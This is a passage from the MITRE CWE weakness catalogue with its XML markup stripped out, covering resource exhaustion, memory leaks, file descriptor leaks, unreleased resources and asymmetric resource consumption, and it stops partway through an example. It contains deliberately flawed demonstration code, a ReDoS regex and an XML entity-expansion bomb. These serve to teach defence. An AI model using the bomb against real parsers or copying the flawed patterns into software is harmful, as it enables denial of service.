that attempt to read data from closed sockets. + https://www.cve.org/CVERecord?id=CVE-2008-2122 + + + CVE-2008-1700 + Product allows attackers to cause a denial of service via a large number of directives, each of which opens a separate window. + https://www.cve.org/CVERecord?id=CVE-2008-1700 + + + CVE-2007-4103 + Product allows resource exhaustion via a large number of calls that do not complete a 3-way handshake. + https://www.cve.org/CVERecord?id=CVE-2007-4103 + + + CVE-2006-1173 + Mail server does not properly handle deeply nested multipart MIME messages, leading to stack exhaustion. + https://www.cve.org/CVERecord?id=CVE-2006-1173 + + + CVE-2007-0897 + Chain: anti-virus product encounters a malformed file but returns from a function without closing a file descriptor (CWE-775) leading to file descriptor consumption (CWE-400) and failed scans. + https://www.cve.org/CVERecord?id=CVE-2007-0897 + + + + + Resource exhaustion (file descriptor, disk space, sockets, ...) + + + A9 + Denial of Service + CWE More Specific + + + 10 + Denial of Service + + + 41 + XML Attribute Blowup + + + SER12-J + Avoid memory and resource leaks during serialization + + + MSC05-J + Do not exhaust heap space + + + SFP13 + Unrestricted Consumption + + + Part 3-3 + Req SR 7.1 + + + Part 3-3 + Req SR 7.2 + + + Part 4-1 + Req SI-1 + + + Part 4-1 + Req SVV-3 + + + Part 4-2 + Req CR 7.1 + + + Part 4-2 + Req CR 7.2 + + + + + + + + + + + + + + + + Discouraged + CWE-400 is intended for incorrect behaviors in which the product is expected to track and restrict how many resources it consumes, but CWE-400 is often misused because it is conflated with the "technical impact" of vulnerabilities in which resource consumption occurs. It is sometimes used for low-information vulnerability reports. It is a level-1 Class (i.e., a child of a Pillar). + Closely analyze the specific mistake that is causing resource consumption, and perform a CWE mapping for that mistake. Consider children/descendants such as CWE-770: Allocation of Resources Without Limits or Throttling, CWE-771: Missing Reference to Active Allocated Resource, CWE-410: Insufficient Resource Pool, CWE-772: Missing Release of Resource after Effective Lifetime, CWE-834: Excessive Iteration, CWE-405: Asymmetric Resource Consumption (Amplification), and others. + + + + + + "Resource consumption" could be interpreted as a consequence instead of an insecure behavior, so this entry is being considered for modification. It appears to be referenced too frequently when more precise mappings are available. Some of its children, such as CWE-771, might be better considered as a chain. + Vulnerability theory is largely about how behaviors and resources interact. "Resource exhaustion" can be regarded as either a consequence or an attack, depending on the perspective. This entry is an attempt to reflect the underlying weaknesses that enable these attacks (or consequences) to take place. + + Database queries that take a long time to process are good DoS targets. An attacker would have to write a few lines of Perl code to generate enough traffic to exceed the site's ability to keep up. This would effectively prevent authorized users from using the site at all. Resources can be exploited simply by ensuring that the target machine must do much more work and consume more resources in order to service a request than the attacker must do to initiate a request. + A prime example of this can be found in old switches that were vulnerable to "macof" attacks (so named for a tool developed by Dugsong). These attacks flooded a switch with random IP and MAC address combinations, therefore exhausting the switch's cache, which held the information of which port corresponded to which MAC addresses. Once this cache was exhausted, the switch would fail in an insecure way and would begin to act simply as a hub, broadcasting all traffic on all ports and allowing for basic sniffing attacks. + + The Taxonomy_Mappings to ISA/IEC 62443 were added in CWE 4.10, but they are still under review and might change in future CWE versions. These draft mappings were performed by members of the "Mapping CWE to 62443" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG), and their work is incomplete as of CWE 4.10. The mappings are included to facilitate discussion and review by the broader ICS/OT community, and they are likely to change in future CWE versions. + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2009-01-12 + updated Description + + + CWE Content Team + MITRE + 2009-05-27 + updated Name, Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Description, Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Observed_Examples, Other_Notes, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2010-02-16 + updated Detection_Factors, Potential_Mitigations, References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Description + + + CWE Content Team + MITRE + 2010-09-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples, Likelihood_of_Exploit, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References, Type + + + CWE Content Team + MITRE + 2019-01-03 + updated Alternate_Terms, Description, Name, Relationships, Taxonomy_Mappings, Theoretical_Notes + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Description, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Description, Maintenance_Notes + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description, Detection_Factors, Maintenance_Notes, Related_Attack_Patterns, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-04-27 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-01-24 + 4.10 + 2023-01-31 + Suggested mappings to ISA/IEC 62443. + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-25 + Suggested mappings to ISA/IEC 62443. + + Resource Exhaustion + Uncontrolled Resource Consumption (aka 'Resource Exhaustion') + Uncontrolled Resource Consumption ('Resource Exhaustion') + + + + The product does not sufficiently track and release allocated memory after it has been used, which slowly consumes remaining memory. + This is often triggered by improper handling of malformed data or unexpectedly interrupted sessions. In some languages, developers are responsible for tracking memory allocation and releasing the memory. If there are no more pointers or references to the memory, then it can no longer be tracked and identified for release. + + + + + + + + Resultant + + + + + + + + + Memory Leak + + + + + Implementation + + Memory leaks have two common and sometimes overlapping causes: + + Error conditions and other exceptional circumstances + Confusion over which part of the program is responsible for freeing the memory + + + + + Medium + + + Availability + DoS: Crash, Exit, or Restart + DoS: Instability + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + Most memory leaks result in general product reliability problems, but if an attacker can intentionally trigger a memory leak, the attacker might be able to launch a denial of service attack (by crashing or hanging the program) or take advantage of other unexpected program behavior resulting from a low memory condition. + + + Other + Reduce Performance + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Libraries or Frameworks + + Choose a language or tool that provides automatic memory management, or makes manual memory management less error-prone. + For example, glibc in Linux provides protection against free of invalid pointers. + When using Xcode to target OS X or iOS, enable automatic reference counting (ARC) [REF-391]. + To help correctly and consistently manage memory when programming in C++, consider using a smart pointer class such as std::auto_ptr (defined by ISO/IEC ISO/IEC 14882:2003), std::shared_ptr and std::unique_ptr (specified by an upcoming revision of the C++ standard, informally referred to as C++ 1x), or equivalent solutions such as Boost. + + + + Architecture and Design + Use an abstraction library to abstract away risky APIs. Not a complete solution. + + + Architecture and Design + Build and Compilation + The Boehm-Demers-Weiser Garbage Collector or valgrind can be used to detect leaks in code. + This is not a complete solution as it is not 100% effective. + + + + + The following C function leaks a block of allocated memory if the call to read() does not return the expected number of bytes: + + char* getBlock(int fd) { + char* buf = (char*) malloc(BLOCK_SIZE);if (!buf) {return NULL;}if (read(fd, buf, BLOCK_SIZE) != BLOCK_SIZE) { + + return NULL; + }return buf; + } + + + + + + CVE-2005-3119 + Memory leak because function does not free() an element of a data structure. + https://www.cve.org/CVERecord?id=CVE-2005-3119 + + + CVE-2004-0427 + Memory leak when counter variable is not decremented. + https://www.cve.org/CVERecord?id=CVE-2004-0427 + + + CVE-2002-0574 + chain: reference count is not decremented, leading to memory leak in OS by sending ICMP packets. + https://www.cve.org/CVERecord?id=CVE-2002-0574 + + + CVE-2005-3181 + Kernel uses wrong function to release a data structure, preventing data from being properly tracked by other code. + https://www.cve.org/CVERecord?id=CVE-2005-3181 + + + CVE-2004-0222 + Memory leak via unknown manipulations as part of protocol test suite. + https://www.cve.org/CVERecord?id=CVE-2004-0222 + + + CVE-2001-0136 + Memory leak via a series of the same command. + https://www.cve.org/CVERecord?id=CVE-2001-0136 + + + + Memory Management + + + Memory + + + + Memory leak + + + Memory Leak + + + Failure to deallocate data + + + A9 + Denial of Service + CWE More Specific + + + MEM31-C + Free dynamically allocated memory when no longer needed + Exact + + + MSC04-J + Do not leak memory + + + SFP14 + Failure to Release Resource + + + ASCPEM-PRF-14 + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This is often a resultant weakness due to improper handling of malformed data or early termination of sessions. + "memory leak" has sometimes been used to describe other kinds of issues, e.g. for information leaks in which the contents of memory are inadvertently leaked (CVE-2003-0400 is one such example of this terminology conflict). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, References, Relationship_Notes, Taxonomy_Mappings, Terminology_Notes + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-03-10 + updated Other_Notes + + + CWE Content Team + MITRE + 2009-05-27 + updated Name + + + KDM Analytics + 2009-07-17 + Improved the White_Box_Definition + + + CWE Content Team + MITRE + 2009-07-27 + updated White_Box_Definitions + + + CWE Content Team + MITRE + 2009-10-29 + updated Modes_of_Introduction, Other_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2010-06-21 + updated Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Demonstrative_Examples, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Alternate_Terms + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Observed_Examples + + + CWE Content Team + MITRE + 2014-02-18 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated References, Relationships, Taxonomy_Mappings, White_Box_Definitions + + + CWE Content Team + MITRE + 2019-01-03 + updated Common_Consequences, Demonstrative_Examples, Name, References, Relationships, Taxonomy_Mappings, Type, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2019-06-20 + updated Description, Name + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Memory Leak + Failure to Release Memory Before Removing Last Reference (aka 'Memory Leak') + Failure to Release Memory Before Removing Last Reference ('Memory Leak') + Improper Release of Memory Before Removing Last Reference ('Memory Leak') + Improper Release of Memory Before Removing Last Reference + + + + The product makes resources available to untrusted parties when those resources are only intended to be accessed by the product. + + + + + + Resource Leak + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Read Application Data + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Resource leaks + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Alternate_Terms + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Resource Leaks + Transmission of Private Resources into a New Sphere (aka 'Resource Leak') + + + + A process does not close sensitive file descriptors before invoking a child process, which allows the child to perform unauthorized I/O operations using those descriptors. + When a new process is forked or executed, the child process inherits any open file descriptors. When the child process has fewer privileges than the parent process, this might introduce a vulnerability if the child process can access the file descriptor but does not have the privileges to access the associated file. + + + + + + + + + + File descriptor leak + While this issue is frequently called a file descriptor leak, the "leak" term is often used in two different ways - exposure of a resource, or consumption of a resource. Use of this term could cause confusion. + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Confidentiality + Integrity + Read Application Data + Modify Application Data + + + + + CVE-2003-0740 + Server leaks a privileged file descriptor, allowing the server to be hijacked. + https://www.cve.org/CVERecord?id=CVE-2003-0740 + + + CVE-2004-1033 + File descriptor leak allows read of restricted files. + https://www.cve.org/CVERecord?id=CVE-2004-1033 + + + CVE-2000-0094 + Access to restricted resource using modified file descriptor for stderr. + https://www.cve.org/CVERecord?id=CVE-2000-0094 + + + CVE-2002-0638 + Open file descriptor used as alternate channel in complex race condition. + https://www.cve.org/CVERecord?id=CVE-2002-0638 + + + CVE-2003-0489 + Program does not fully drop privileges after creating a file descriptor, which allows access to the descriptor via a separate vulnerability. + https://www.cve.org/CVERecord?id=CVE-2003-0489 + + + CVE-2003-0937 + User bypasses restrictions by obtaining a file descriptor then calling setuid program, which does not close the descriptor. + https://www.cve.org/CVERecord?id=CVE-2003-0937 + + + CVE-2004-2215 + Terminal manager does not properly close file descriptors, allowing attackers to access terminals of other users. + https://www.cve.org/CVERecord?id=CVE-2004-2215 + + + CVE-2006-5397 + Module opens a file for reading twice, allowing attackers to read files. + https://www.cve.org/CVERecord?id=CVE-2006-5397 + + + + System Process + File or Directory + + + + UNIX file descriptor leak + + + FIO42-C + Ensure files are properly closed when they are no longer needed + + + SFP23 + Exposed Data + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Affected_Resources, Observed_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Alternate_Terms, Description, Name, Observed_Examples, References + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Applicable_Platforms, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + UNIX File Descriptor Leak + Exposure of File Descriptor to Unintended Control Sphere + + + + The product does not release or incorrectly releases a resource before it is made available for re-use. + When a resource is created or allocated, the developer is responsible for properly releasing the resource as well as accounting for all potential paths of expiration or invalidation, such as a set period of time or revocation. + + + + + + + + Primary + Improper release or shutdown of resources can be primary to resource exhaustion, performance, and information confidentiality problems to name a few. + + + Resultant + Improper release or shutdown of resources can be resultant from improper error handling or insufficient resource tracking. + + + + + + + + Implementation + + + Medium + + + Availability + Other + DoS: Resource Consumption (Other) + Varies by Context + Most unreleased resource issues result in general software reliability problems, but if an attacker can intentionally trigger a resource leak, the attacker might be able to launch a denial of service attack by depleting the resource pool. + + + Confidentiality + Read Application Data + When a resource containing sensitive information is not correctly shutdown, it may expose the sensitive data in a subsequent allocation. + + + + + Automated Dynamic Analysis + + This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + Resource clean up errors might be detected with a stress-test by calling the software simultaneously from a large number of threads or processes, and look for evidence of any unexpected behavior. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + + Moderate + + + Manual Dynamic Analysis + Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the product under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application's environment, it may still indicate unexpected conditions that were not handled by the application itself. + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Requirements + Language Selection + + Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + For example, languages such as Java, Ruby, and Lisp perform automatic garbage collection that releases memory for objects that have been deallocated. + + + + Implementation + It is good practice to be responsible for freeing all resources you allocate and to be consistent with how and where you free memory in a function. If you allocate memory that you intend to free upon completion of the function, you must be sure to free the memory at all exit points for that function including error conditions. + + + Implementation + Memory should be allocated/freed using matching functions such as malloc/free, new/delete, and new[]/delete[]. + + + Implementation + When releasing a complex object or structure, ensure that you properly dispose of all of its member components, not just the object itself. + + + + + The following method never closes the new file handle. Given enough time, the Finalize() method for BufferReader should eventually call Close(), but there is no guarantee as to how long this action will take. In fact, there is no guarantee that Finalize() will ever be invoked. In a busy environment, the Operating System could use up all of the available file handles before the Close() function is called. + + private void processFile(string fName){BufferReader fil = new BufferReader(new FileReader(fName));String line;while ((line = fil.ReadLine()) != null){processLine(line);}} + + The good code example simply adds an explicit call to the Close() function when the system is done using the file. Within a simple example such as this the problem is easy to see and fix. In a real system, the problem may be considerably more obscure. + + private void processFile(string fName){BufferReader fil = new BufferReader(new FileReader(fName));String line;while ((line = fil.ReadLine()) != null){processLine(line);}fil.Close();} + + + + This code attempts to open a connection to a database and catches any exceptions that may occur. + + try {Connection con = DriverManager.getConnection(some_connection_string);}catch ( Exception e ) {log( e );} + + If an exception occurs after establishing the database connection and before the same connection closes, the pool of database connections may become exhausted. If the number of available connections is exceeded, other users cannot access this resource, effectively denying access to the application. + + + Under normal conditions the following C# code executes a database query, processes the results returned by the database, and closes the allocated SqlConnection object. But if an exception occurs while executing the SQL or processing the results, the SqlConnection object is not closed. If this happens often enough, the database will run out of available cursors and not be able to execute any more SQL queries. + + ...SqlConnection conn = new SqlConnection(connString);SqlCommand cmd = new SqlCommand(queryString);cmd.Connection = conn;conn.Open();SqlDataReader rdr = cmd.ExecuteReader();HarvestResults(rdr);conn.Connection.Close();... + + + + The following C function does not close the file handle it opens if an error occurs. If the process is long-lived, the process can run out of file handles. + + int decodeFile(char* fName) { + char buf[BUF_SZ];FILE* f = fopen(fName, "r");if (!f) {printf("cannot open %s\n", fName);return DECODE_FAIL;}else { + while (fgets(buf, BUF_SZ, f)) {if (!checkChecksum(buf)) {return DECODE_FAIL;}else {decodeBlock(buf);}} + }fclose(f);return DECODE_SUCCESS; + } + + + + In this example, the program does not use matching functions such as malloc/free, new/delete, and new[]/delete[] to allocate/deallocate the resource. + + class A {void foo();};void A::foo(){int *ptr;ptr = (int*)malloc(sizeof(int));delete ptr;} + + + + In this example, the program calls the delete[] function on non-heap memory. + + class A{void foo(bool);};void A::foo(bool heap) {int localArray[2] = {11,22};int *p = localArray;if (heap){p = new int[2];}delete[] p;} + + + + + + CVE-1999-1127 + Does not shut down named pipe connections if malformed data is sent. + https://www.cve.org/CVERecord?id=CVE-1999-1127 + + + CVE-2001-0830 + Sockets not properly closed when attacker repeatedly connects and disconnects from server. + https://www.cve.org/CVERecord?id=CVE-2001-0830 + + + CVE-2002-1372 + Return values of file/socket operations not checked, allowing resultant consumption of file descriptors. + https://www.cve.org/CVERecord?id=CVE-2002-1372 + + + + + Improper resource shutdown or release + + + Unreleased Resource + + + A9 + Denial of Service + CWE More Specific + + + FIO42-C + Close files when they are no longer needed + CWE More Abstract + + + MEM31-C + Free dynamically allocated memory when no longer needed + CWE More Abstract + + + FIO04-J + Release resources when they are no longer needed + + + SFP14 + Failure to release resource + + + + + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + Overlaps memory leaks, asymmetric resource consumption, malformed input errors. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Relationships + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Common_Consequences, Likelihood_of_Exploit, Other_Notes, Potential_Mitigations, Relationship_Notes, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2010-06-21 + updated Detection_Factors, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-03-29 + updated Weakness_Ordinalities + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-02-18 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-06-23 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Functional_Areas, Likelihood_of_Exploit, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Detection_Factors + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not properly control situations in which an adversary can cause the product to consume or produce excessive resources without requiring the adversary to invest equivalent work or otherwise prove authorization, i.e., the adversary's influence is "asymmetric." + This can lead to poor performance due to "amplification" of resource consumption, typically in a non-linear fashion. This situation is worsened if the product allows malicious users or attackers to consume more resources than their access level permits. + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + Operation + + + + + Availability + DoS: Amplification + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + DoS: Resource Consumption (Other) + High + Sometimes this is a factor in "flood" attacks, but other types of amplification exist. + + + + + Architecture and Design + An application must make resources available to a client commensurate with the client's access level. + + + Architecture and Design + An application must, at all times, keep track of allocated resources and meter their usage appropriately. + + + System Configuration + Consider disabling resource-intensive algorithms on the server side, such as Diffie-Hellman key exchange. + High + Business requirements may prevent disabling resource-intensive algorithms. + + + + + This code listens on a port for DNS requests and sends the result to the requesting address. + + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)sock.bind( (UDP_IP,UDP_PORT) )while true: + data = sock.recvfrom(1024)if not data:break + (requestIP, nameToResolve) = parseUDPpacket(data)record = resolveName(nameToResolve)sendResponse(requestIP,record) + + + + This code sends a DNS record to a requesting IP address. UDP allows the source IP address to be easily changed ('spoofed'), thus allowing an attacker to redirect responses to a target, which may be then be overwhelmed by the network traffic. + + + This data prints the contents of a specified file requested by a user. + + function printFile($username,$filename){ + + + //read file into string + $file = file_get_contents($filename);if ($file && isOwnerOf($username,$filename)){echo $file;return true;}else{echo 'You are not authorized to view this file';}return false; + } + + This code first reads a specified file into memory, then prints the file if the user is authorized to see its contents. The read of the file into memory may be resource intensive and is unnecessary if the user is not allowed to see the file anyway. + + + The DTD and the very brief XML below illustrate what is meant by an XML bomb. The ZERO entity contains one character, the letter A. The choice of entity name ZERO is being used to indicate length equivalent to that exponent on two, that is, the length of ZERO is 2^0. Similarly, ONE refers to ZERO twice, therefore the XML parser will expand ONE to a length of 2, or 2^1. Ultimately, we reach entity THIRTYTWO, which will expand to 2^32 characters in length, or 4 GB, probably consuming far more data than expected. + + <?xml version="1.0"?><!DOCTYPE MaliciousDTD [<!ENTITY ZERO "A"><!ENTITY ONE "&ZERO;&ZERO;"><!ENTITY TWO "&ONE;&ONE;">...<!ENTITY THIRTYTWO "&THIRTYONE;&THIRTYONE;">]><data>&THIRTYTWO;</data> + + + + This example attempts to check if an input string is a "sentence" [REF-1164]. + + var test_string = "Bad characters: $@#"; + var bad_pattern = /^(\w+\s?)*$/i; + var result = test_string.search(bad_pattern); + + The regular expression has a vulnerable backtracking clause inside (\w+\s?)*$ which can be triggered to cause a Denial of Service by processing particular phrases. + To fix the backtracking problem, backtracking is removed with the ?= portion of the expression which changes it to a lookahead and the \2 which prevents the backtracking. The modified example is: + + var test_string = "Bad characters: $@#"; + var good_pattern = 